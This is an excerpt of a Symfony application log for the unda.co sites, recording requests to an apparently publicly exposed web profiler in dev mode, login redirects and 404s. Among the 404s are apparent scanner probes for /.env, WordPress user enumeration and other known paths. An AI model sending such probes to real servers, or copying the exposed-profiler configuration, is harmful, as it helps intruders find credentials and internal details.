  4115. [2025-12-18 16:48:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4116. [2025-12-18 16:48:46] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  4117. [2025-12-18 16:50:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"411235","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/411235?panel=validator","method":"GET"} []
  4118. [2025-12-18 16:50:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  4119. [2025-12-18 16:53:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa","method":"GET"} []
  4120. [2025-12-18 16:53:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4121. [2025-12-18 16:54:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4122. [2025-12-18 16:56:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b2689b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b2689b?panel=dump","method":"GET"} []
  4123. [2025-12-18 16:56:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  4124. [2025-12-18 17:00:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a2a520?panel=exception","method":"GET"} []
  4125. [2025-12-18 17:00:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  4126. [2025-12-18 17:01:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6","method":"GET"} []
  4127. [2025-12-18 17:01:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4128. [2025-12-18 17:02:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"30fc6c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/30fc6c?panel=security","method":"GET"} []
  4129. [2025-12-18 17:02:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4130. [2025-12-18 17:13:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=config","method":"GET"} []
  4131. [2025-12-18 17:13:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4132. [2025-12-18 17:22:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=router","method":"GET"} []
  4133. [2025-12-18 17:22:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4134. [2025-12-18 17:23:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=request","method":"GET"} []
  4135. [2025-12-18 17:23:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4136. [2025-12-18 17:24:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3","method":"GET"} []
  4137. [2025-12-18 17:24:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4138. [2025-12-18 17:28:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c79b71","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c79b71?panel=time","method":"GET"} []
  4139. [2025-12-18 17:28:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4140. [2025-12-18 17:29:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e17e24","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e17e24?panel=cache","method":"GET"} []
  4141. [2025-12-18 17:29:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4142. [2025-12-18 17:32:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4143. [2025-12-18 17:32:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=twig","method":"GET"} []
  4144. [2025-12-18 17:32:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4145. [2025-12-18 17:35:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c31f1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7c31f1?panel=exception","method":"GET"} []
  4146. [2025-12-18 17:35:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  4147. [2025-12-18 17:41:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=cache","method":"GET"} []
  4148. [2025-12-18 17:41:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4149. [2025-12-18 17:45:11] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4150. [2025-12-18 17:48:38] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  4151. [2025-12-18 17:49:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=twig","method":"GET"} []
  4152. [2025-12-18 17:49:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4153. [2025-12-18 17:50:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4154. [2025-12-18 17:50:21] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  4155. [2025-12-18 17:50:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  4156. [2025-12-18 17:50:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  4157. [2025-12-18 17:50:21] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  4158. [2025-12-18 17:50:21] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4159. [2025-12-18 17:50:21] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4160. [2025-12-18 17:50:21] security.DEBUG: Calling Authentication entry point. [] []
  4161. [2025-12-18 17:50:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d8e76d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d8e76d","method":"GET"} []
  4162. [2025-12-18 17:50:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4163. [2025-12-18 17:51:55] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  4164. [2025-12-18 17:57:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"819624","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/819624?panel=cache","method":"GET"} []
  4165. [2025-12-18 17:57:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4166. [2025-12-18 17:57:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=cache","method":"GET"} []
  4167. [2025-12-18 17:57:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4168. [2025-12-18 17:57:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e80d5b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e80d5b?panel=form","method":"GET"} []
  4169. [2025-12-18 17:57:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4170. [2025-12-18 17:58:37] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  4171. [2025-12-18 17:58:37] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  4172. [2025-12-18 17:58:37] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  4173. [2025-12-18 17:58:37] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  4174. [2025-12-18 17:58:37] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4175. [2025-12-18 17:58:37] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4176. [2025-12-18 17:58:37] security.DEBUG: Calling Authentication entry point. [] []
  4177. [2025-12-18 17:58:38] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  4178. [2025-12-18 17:59:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89abd5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/89abd5?panel=form","method":"GET"} []
  4179. [2025-12-18 17:59:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4180. [2025-12-18 17:59:50] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"bf2808","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/bf2808/search/results?limit=10&method=GET","method":"GET"} []
  4181. [2025-12-18 17:59:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  4182. [2025-12-18 18:01:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4183. [2025-12-18 18:02:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4184. [2025-12-18 18:02:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  4185. [2025-12-18 18:05:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=config","method":"GET"} []
  4186. [2025-12-18 18:05:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4187. [2025-12-18 18:06:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  4188. [2025-12-18 18:06:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4189. [2025-12-18 18:06:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4190. [2025-12-18 18:06:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4191. [2025-12-18 18:06:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4192. [2025-12-18 18:06:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4193. [2025-12-18 18:06:36] security.DEBUG: Calling Authentication entry point. [] []
  4194. [2025-12-18 18:13:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=security","method":"GET"} []
  4195. [2025-12-18 18:13:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4196. [2025-12-18 18:17:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4197. [2025-12-18 18:19:24] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  4198. [2025-12-18 18:19:24] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4199. [2025-12-18 18:19:24] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4200. [2025-12-18 18:19:24] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4201. [2025-12-18 18:19:24] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  4202. [2025-12-18 18:19:24] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  4203. [2025-12-18 18:19:24] security.DEBUG: Calling Authentication entry point. [] []
  4204. [2025-12-18 18:20:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=request","method":"GET"} []
  4205. [2025-12-18 18:20:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4206. [2025-12-18 18:28:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=time","method":"GET"} []
  4207. [2025-12-18 18:28:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4208. [2025-12-18 18:29:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b3e983","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b3e983?panel=time","method":"GET"} []
  4209. [2025-12-18 18:29:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4210. [2025-12-18 18:32:58] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  4211. [2025-12-18 18:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /p/u/doAuthentication.do"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /p/u/doAuthentication.do\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4212. [2025-12-18 18:34:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d9ab8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1d9ab8?panel=exception","method":"GET"} []
  4213. [2025-12-18 18:34:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  4214. [2025-12-18 18:36:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=security","method":"GET"} []
  4215. [2025-12-18 18:36:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4216. [2025-12-18 18:37:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=router","method":"GET"} []
  4217. [2025-12-18 18:37:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4218. [2025-12-18 18:38:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f750b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f750b2?panel=validator","method":"GET"} []
  4219. [2025-12-18 18:38:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  4220. [2025-12-18 18:40:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4221. [2025-12-18 18:44:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"61c5a3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/61c5a3?panel=request","method":"GET"} []
  4222. [2025-12-18 18:44:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4223. [2025-12-18 18:52:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c8bec6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c8bec6?panel=time","method":"GET"} []
